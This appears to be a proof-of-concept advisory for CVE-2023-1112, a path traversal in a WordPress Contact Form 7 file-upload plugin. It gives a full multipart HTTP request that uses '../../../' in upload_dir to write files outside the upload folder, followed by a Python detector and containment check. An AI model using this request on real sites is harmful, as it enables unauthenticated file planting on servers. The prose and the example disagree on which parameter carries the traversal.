
PoC details: a38151b305553c29d88255fe7d78afa53cf189bc

Related vulnerability
Title: WordPress plugin Drag and Drop Multiple File Upload Contact Form 7 path traversal vulnerability (CVE-2023-1112)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a server running PHP and MySQL. A WordPress plugin is an add-on application. Version 5.0.6.1 of the WordPress plugin Drag and Drop Multiple File Upload Contact Form 7 contains a security vulnerability caused by improper handling of the parameter upload_name, which leads to relative path traversal.
Description
Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal (CVE-2023-1112)
Introduction
# CVE-2023-1112 - Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal

# Info
Path Traversal in Drag and Drop Multiple File Uploader PRO - Contact Form 7 version 5.0.6.1 allows an unauthenticated remote attacker to upload files to any writable location on the remote server (CVE-2023-1112).

To exploit this vulnerability, the attacker needs to upload a file using the plugin's form. This POST request has to carry the parameter `upload_name`, whose value is the name of the folder the file will be uploaded to. The attacker can supply any value, such as `../`, `../../../`, or `foldername` (which creates the folder "foldername" inside the upload directory).

# Example

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.org
Content-Length: 756
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIzvIrbHjHpxzepPi
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="size_limit"

2e+9
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_dir"

../../../
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="post_id"

1868
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="security"

0a4dca2b89
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="form_id"

9210
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_name"

foto
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload-file"; filename="pngout.png"
Content-Type: image/png

// image contents
------WebKitFormBoundaryIzvIrbHjHpxzepPi--

```
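The containment check the vulnerable version lacks, together with a detector that parses a form submission shaped like the request above, as an added Python example (not the plugin's or the README author's code). The upload root path and the request body are constructed assumptions.

```python
import posixpath
from email.parser import BytesParser
from email.policy import default

# Assumed plugin upload root (hypothetical path, not taken from the plugin).
UPLOAD_BASE = "/var/www/html/wp-content/uploads/wp_dndcf7_uploads"
FOLDER_FIELDS = ("upload_dir", "upload_name")

def parse_multipart(content_type: str, body: bytes) -> dict:
    """Parse a multipart/form-data body into {field: value}; file parts map to their filename."""
    msg = BytesParser(policy=default).parsebytes(f"Content-Type: {content_type}\r\n\r\n".encode() + body)
    fields = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        if name is None:
            continue
        filename = part.get_param("filename", header="content-disposition")
        payload = part.get_payload(decode=True) or b""
        fields[name] = filename if filename else payload.decode(errors="replace").strip()
    return fields

def resolve_target(upload_dir: str, upload_name: str):
    """Directory the file would land in, or None when the normalised path leaves UPLOAD_BASE.
    Normalising first and only then checking containment is the guard the vulnerable version lacks."""
    candidate = posixpath.normpath(posixpath.join(UPLOAD_BASE, upload_dir, upload_name))
    if candidate == UPLOAD_BASE or candidate.startswith(UPLOAD_BASE + "/"):
        return candidate
    return None

def inspect_upload_request(content_type: str, body: bytes) -> dict:
    """Classify a dnd_codedropz_upload request: where it would write and whether it escapes the root."""
    fields = parse_multipart(content_type, body)
    if fields.get("action") != "dnd_codedropz_upload":
        return {"relevant": False}
    target = resolve_target(fields.get("upload_dir", ""), fields.get("upload_name", ""))
    flagged = [f for f in FOLDER_FIELDS if ".." in fields.get(f, "") or fields.get(f, "").startswith("/")]
    return {"relevant": True, "target": target, "escapes": target is None, "flagged_fields": flagged}

# Constructed request body modelled on the README's example (not a real capture).
BOUNDARY = "----WebKitFormBoundaryIzvIrbHjHpxzepPi"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"

def build_body(upload_dir: str, upload_name: str = "foto") -> bytes:
    text_fields = {"action": "dnd_codedropz_upload", "upload_dir": upload_dir, "upload_name": upload_name}
    out = "".join(f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
                  for k, v in text_fields.items())
    out += (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="upload-file"; filename="pngout.png"\r\n'
            f"Content-Type: image/png\r\n\r\nPNGDATA\r\n--{BOUNDARY}--\r\n")
    return out.encode()
```

Calling `inspect_upload_request(CONTENT_TYPE, build_body("../../../"))` reports `escapes: True` with `upload_dir` flagged, while `build_body("")` resolves to a folder under the upload root.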
# Screenshots

### Normal request
![image](https://user-images.githubusercontent.com/3837916/216743824-2a11a7e6-d954-4a1d-ac98-7ddc0d996dcd.png)

### Malicious request
![image](https://user-images.githubusercontent.com/3837916/216743964-378a88d4-ed53-481b-a748-8c09c9868070.png)

### Malicious request successfully uploaded the file to the webserver root
![image](https://user-images.githubusercontent.com/3837916/216744024-50997229-58d5-4e76-9e74-aa4c9fc27a00.png)